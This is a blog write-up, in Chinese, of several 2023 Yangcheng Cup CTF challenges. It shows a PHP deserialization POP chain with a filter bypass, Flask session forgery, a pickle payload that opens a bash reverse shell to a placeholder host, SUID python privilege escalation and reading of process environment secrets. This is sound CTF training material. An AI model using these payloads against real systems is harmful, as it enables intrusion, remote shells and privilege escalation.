羊城杯2023 部分wp

已于 2023-09-04 00:34:49 修改
阅读量2.3k 收藏 4
点赞数 3
分类专栏: 比赛wp 文章标签: CTF
于 2023-09-04 00:30:04 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_63231007/article/details/132658135
版权

目录

D0n't pl4y g4m3!!!(php7.4.21源码泄露&pop链构造)

Serpent(pickle反序列化&python提权)

ArkNights(环境变量泄露)

Ez_misc(win10sinpping_tools恢复)

D0n't pl4y g4m3!!!(php7.4.21源码泄露&pop链构造)

访问/p0p.php 跳转到了游戏界面

应该是存在302跳转 burp抓包 提示 /hint.zip

下载下来得到一段密文:

Ö0 0vO Ow0 0w0 Ö0 ÖO Ö.O o_o 0.O OvO o.0 owo o.Ö Ö.Ö Ovo 0Ö Öo owO O.0 owo Öo owO O.0 owo Ö0 0wÖ O.0 0w0 Ö0 OwO ov0 owo o_O O.Ö Övo

尊嘟假嘟翻译器解密得到:flag在/tmp/catcatf1ag.txt

PHP<=7.4.21

存在Development Server源码泄露漏洞

得到 p0p.php的源码:

 <?php
 header("HTTP/1.1 302 found");
 header("Location:https://www.baidu.com");
 ​
 class Pro{
     private $exp;
     private $rce2;
 ​
     public function __get($name)
     {
         return $this->$rce2=$this->exp[$rce2];
     }
     public  function __toString()
     {
         call_user_func('system', "cat /flag");
     }
 }
 ​
 class Yang
 {
     public function __call($name, $ary)
     {
         if ($this->key === true || $this->finish1->name) {
             if ($this->finish->finish) {
                 call_user_func($this->now[$name], $ary[0]);
             }
         }
     }
     public function ycb()
     {
         $this->now = 0;
         return $this->finish->finish;
     }
     public function __wakeup()
     {
         $this->key = True;
     }
 }
 class Cheng
 {
     private $finish;
     public $name;
     public function __get($value)
     {
 ​
         return $this->$value = $this->name[$value];
     }
 }
 class Bei
 {
     public function __destruct()
     {
         if ($this->CTF->ycb()) {
             $this->fine->YCB1($this->rce, $this->rce1);
         }
     }
     public function __wakeup()
     {
         $this->key = false;
     }
 }
 ​
 function prohib($a){
     $filter = "/system|exec|passthru|shell_exec|popen|proc_open|pcntl_exec|eval|flag/i";
     return preg_replace($filter,'',$a);
 }
 ​
 $a = $_POST["CTF"];
 if (isset($a)){
     unserialize(prohib($a));
 }
 ?>
 # ./有hint.zip

简单php反序列化,构造pop链

 <?php
 ​
 class Pro{
     private $exp;
     private $rce2 = "haha";
 ​
     public function __get($name)
     {
         echo "__get()";
         var_dump($this->$rce2=$this->exp[$rce2]);
         return $this->$rce2=$this->exp[$rce2];
     }
     public  function __toString()
     {
         call_user_func('system', "cat /flag");
     }
 }
 ​
 class Yang
 {
     public function __call($name, $ary)
     {
         echo " Yang::__call()  ";
 ​
         if ($this->key === true || $this->finish1->name) {
             if ($this->finish->finish) {
                 echo " call_user_func()";
                 #echo $name,$ary[0];
                 call_user_func($this->now[$name], $ary[0]);
             }
         }
     }
     public function ycb()
     {
         echo " Yang::ycb()  ";
         $this->now = 0;
         return $this->finish->finish; # 给 $this->finish 赋 Cheng类 调其私有属性触发 __get()
     }
     public function __wakeup()
     {
         $this->key = True;
     }
 }
 class Cheng
 {
     private $finish;
     public $name;
     public function __get($value)
     {
         echo " Cheng::__get() ";
         return $this->$value = $this->name[$value]; #
     }
 }
 class Bei
 {
     public function __destruct()
     {
         if ($this->CTF->ycb()) {  # 给$this->CTF 赋 Yang()类 调其 ycb()
             $this->fine->YCB1($this->rce, $this->rce1); # 给$this->fine 赋 Yang 不存在YCB1() 调其 __call()
         }
     }
     public function __wakeup()
     {
         $this->key = false;
     }
 }
 ​
 function prohib($a){
     $filter = "/system|exec|passthru|shell_exec|popen|proc_open|pcntl_exec|eval|flag/i";
     return preg_replace($filter,'',$a);
 }
 ​
 $a = new Bei();
 $a->CTF = new Yang();
 $a->CTF->finish = new Cheng();
 $a->CTF->finish->name = ["finish"=>"aaa"];
 ​
 $a->fine = new Yang();
 ​
 $a->fine->finish = new Cheng();
 $a->fine->finish->name = ["finish"=>"aaa"];
 $a->fine->finish1 = new Cheng();
 $a->fine->finish1->name = 1;
 ​
 $a->fine->now['YCB1'] = "syssystemtem";
 $a->rce = "cat /tmp/catcatf1ag.txt > a";
 ​
 $b = serialize($a);
 echo urlencode($b);
 ?>

由于存在一个过滤

 function prohib($a){
     $filter = "/system|exec|passthru|shell_exec|popen|proc_open|pcntl_exec|eval|flag/i";
     return preg_replace($filter,'',$a);
 }

但是过滤只是将关键字替换为空,可以双写绕过

因此将生成的序列化数据,修改 末尾 s%3A12%3A%22syssystemtem%22%3B%7D%7Ds%3A3%3A%22rce%22%3Bs%3A27%3A%22cat+%2Ftmp%2Fcatcatf1ag.txt+%3E+a%22%3B%7D 的 12替换为 6 这样过滤之后也可以正常反序列化

外带 flag内容到 a 访问/a 得到flag

Serpent(pickle反序列化&python提权)

访问/www.zip得到部分代码

 from flask import Flask, session
 from secret import secret
 ​
 @app.route('/verification')
 def verification():
     try:
         attribute = session.get('Attribute')
         if not isinstance(attribute, dict):
             raise Exception
     except Exception:
         return 'Hacker!!!'
     if attribute.get('name') == 'admin':
         if attribute.get('admin') == 1:
             return secret
         else:
             return "Don't play tricks on me"
     else:
         return "You are a perfect stranger to me"
 ​
 if __name__ == '__main__':
     app.run('0.0.0.0', port=80)
 ​

访问 /verification路由 cookie放到 jwt.io 里

得到 SECRET_KEY:GWHTHKpOjDIQ2b

flask 伪造session

 {"Attribute": {"admin": 1,"name": "admin","secret_key": "GWHTHKpOjDIQ2b"}}

 # python3 flask_session_cookie_manager3.py encode -s "GWHTHKpOjDIQ2b" -t '{"Attribute": {"admin": 1,"name": "admin","secret_key": "GWHTHKpOjDIQ2b"}}'
 eyJBdHRyaWJ1dGUiOnsiYWRtaW4iOjEsIm5hbWUiOiJhZG1pbiIsInNlY3JldF9rZXkiOiJHV0hUSEtwT2pESVEyYiJ9fQ.ZPLH7A.VLZkgFun7fWka435Q3Xrrxb_hWE

然后访问 得到secret

得到 /ppppppppppick1e路由

burp发包,在响应包得到:Hint: Source in /src0de 得到源码:

 @app.route('c0de')
 def src0de():
     f = open(__file__, 'r')
     rsp = f.read()
     f.close()
     return rsp[rsp.index("@app.route('/src0de')"):]
 ​
 @app.route('ppppppppick1e')
 def ppppppppppick1e():
     try:
         username = "admin"
         rsp = make_response("Hello, %s " % username)
         rsp.headers['hint'] = "Source in c0de"
         pick1e = request.cookies.get('pick1e')
         if pick1e is not None:
             pick1e = base64.b64decode(pick1e)
         else:
             return rsp
         if check(pick1e):
             pick1e = pickle.loads(pick1e)
             return "Go for it!!!"
         else:
             return "No Way!!!"
     except Exception as e:
         error_message = str(e)
         return error_message
 ​
     return rsp
 ​
 class GWHT():
     def __init__(self):
         pass
 ​
 if __name__ == '__main__':
     app.run('0.0.0.0', port=80)

在/ppppppppick1e 路由会对session的pick1e值 进行pickle.load() 存在pickle反序列化,但是有一个未知的check() 需要绕过·

 import base64
 ​
 #payload=b'\x80\x03(cbuiltins\ngetattr\np0\ncbuiltins\ndict\np1\nX\x03\x00\x00\x00getop2\n0(g2\n(cbuiltins\nglobals\noX\x0C\x00\x00\x00__builtins__op3\n(g0\ng3\nX\x04\x00\x00\x00evalop4\n(g4\nX\x21\x00\x00\x00__import__("os").system("")o.'
 payload = b'''(cos
 system
 S'bash -c "bash -i >& /dev/tcp/ip/port 0>&1"'
 o.'''
 ​
 # env | tee /tmp/a
 print(base64.b64encode(payload))

可以o操作码绕过,system执行命令 刚开始可能是构造payload出错了,报错信息中还以为过滤了>

反弹不了shell 就一直想着怎么构造回显 将命令执行结构写入文件 查看写入的文件时,又一直显示 Permission Denied 。。。。

最后发现并没有过滤 > bash弹到shell之后,发现没有权限,需要提取 怪不得permission denied

查找具有suid权限的命令,找到了 /usr/bin/python3.8

可以python 进行提权

python3 -c "import os;os.setuid(0);os.system('/bin/bash');"

这里直接 python3 /flag

根据报错信息得到了flag

ArkNights(环境变量泄露)

非预期:

读取 /proc/1/environ 获得flag

Ez_misc(win10sinpping_tools恢复)

下载附件,得到一个图片 下面应该有东西

脚本恢复一下宽、高

宽:0x164

高:0x61

假的flag

010打开图片发现 IEND fivenumbers 字样 可能是win的自带截图

脚本恢复一下

得到flag

葫芦娃42
关注
  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
2023羊城杯 DASCTF EZ-Misc
09-03
2023羊城杯 DASCTF EZ-Misc
2023 羊城杯 final
11-21
附件
【2023羊城杯CTF初赛】程序猿Quby wp
Makabakahaha的博客
09-04 436
羊城杯小记
2023年“羊城杯”网络安全大赛 决赛 AWDP [Break+Fix] Web方向题解wp
Jay17的博客
09-16 6957
2023年“羊城杯”网络安全大赛 决赛 AWDP [Break+Fix] Web方向题解wp
2023年“羊城杯”网络安全大赛 Web方向题解wp
Jay17的博客
09-03 4970
2023年“羊城杯”网络安全大赛 Web方向题解wp
2023羊城杯密码wp
mxx307的博客
09-03 598
2023羊城杯密码wp
2023羊城杯-writeup-web
qq_35607078的博客
09-04 368
2023羊城杯-writeup-web
羊城杯2023misc方向完整wp
toto的博客
09-03 2554
misc孤狼~附件链接:https://pan.baidu.com/s/15vAxjMulb39hXfsomMH-pg?pwd=d00b。
2020YCBCTF羊城杯官方Writeup.pdf
10-28
2020YCBCTF羊城杯官方Writeup.pdf
2020YCBCTF:2020羊城杯官方writeup及
03-24
2020年 2020羊城杯官方writeup及源码 各个过渡的分散的writeup后续会逐步上传,所有转移的writeup已经汇总在wp文件夹下的writeup文件里面了!
羊城快速通道
08-19
然而,标签“课件”提示这可能是教学材料的一部分,但没有足够的上下文来确定这与IT的哪个领域相关。 如果这个"羊城快速通道"是指一种技术解决方案或者IT项目,它可能涉及到城市信息化、智能交通系统或者数据分析在...
PHP<=7.4.21 Development Server源码泄露漏洞
这周末在做梦的博客
03-05 3565
因为特殊的原因CTF荒废了一段时间,近期总算再次捡了起来,算是从头开始了吧。近期比赛刚好遇到了这个漏洞,看国内似乎还没有过多的论述,先总结一波。
2023「羊城杯」DASCTF EZ_Misc Wirteup
zero;
09-03 480
Tips:一道简单的misc捏…
PHP<=7.4.21 Development Server源码泄露漏洞 例题
最新发布
m0_75178803的博客
03-15 768
打开题目dirsearch扫描发现存在shell.php。
windows 安装php7.4并配置phpstorm环境
石宗昊的博客
01-29 2622
官网下载 php https://windows.php.net/download/ 这里我选择的线程不安全的,具体区别看下链接 https://www.cnblogs.com/shaoing/p/11202358.html 建一个目录,然后解压 在其中有两个php配置文件,php.ini-development 和 php.ini-production,两个文件没有太多区别,一个用于开发环境,一个用于生产环境,区别也就是开发环境的配置能够看到更多的错误警告。 将php.ini-developme
羊城杯-2023-Crypto
Emmaaaaa's blog
09-03 993
关键词:有限域开方(或AMM),格,私钥文件损坏,16位随机数预测机制,连分数 本次比赛只做出了前四道,题目难度中等,适合我这种小菜做。 SigninCrypto中的16位随机数预测机制我是真不知道,当时就困在K2,好难受,还是学的不扎实。esyRSA中的n重复了我也没发现,当时确实疑惑了,因为n分解出来好多数,会导致p或q不为素数,但之后也没多想了,唉。 现在细细想想,确实有问题,e * d = 1 % phi,不管e多大,d的数量级都会和phi差不多(也会和n差不多),然而此题中,相差巨大,两倍了
羊城杯总结
NYG694的博客
09-02 175
这是一个重定向网页题目,登陆指定网页到一个游戏界面,一开始以为是通关获得flag,但修改了相关参数,发现没有任何显示,然后想到题目让我们到网页p0p.php,但这实际是执行了一个PHP文件,自动跳转游戏界面,所以还是要从根本去寻找,这里题目给出了两个线索,B.第二种,我想到在原目录下进行扫描,扫到start.sh然后访问下载下来,发现是一个创建本地进程,但脚本里蕴含的变量在自己电脑是不存在的,所以通过文本打开寻找线索。
PHP 7.4的新增特性(功能,弃用,速度)
热门推荐
Mr. 亮先生的博客
10-21 2万+
PHP 下一个PHP 7里程版本PHP 7.4预计将于2019年11月28日正式发布。因此,现在该让我们深入研究一些最令人兴奋的新增功能和新功能,这些功能将使PHP更快,更可靠。 。 实际上,即使PHP 7.4显着提高了性能并提高了代码的可读性,PHP 8仍将是PHP性能的真正里程碑,因为JIT包含的建议已得到批准。 无论如何,今天我们正在经历一些我们期望的PHP 7.4最有趣的功能和更...
WordPress升级PHP版本至7.4.21
weixin_42238038的博客
07-08 1302
记一次公司官网wordpress升级php 用了此教程http://www.bh7lsw.cn/archives/16044 内容如下(#后是附带有结合我的操作和说明): WordPress建站,非常好用, 其自身的升级十分方便。 但WordPress完全基于PHP语言, PHP的升级看起来略感复杂。 以下,介绍一次成功的PHP升级, 希望对遇到类似情况的朋友有帮助。 感谢W9小新的指导。 人总是不见棺材不掉泪, 终于,到了不得不升级PHP的时候, 因为: Composer d

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值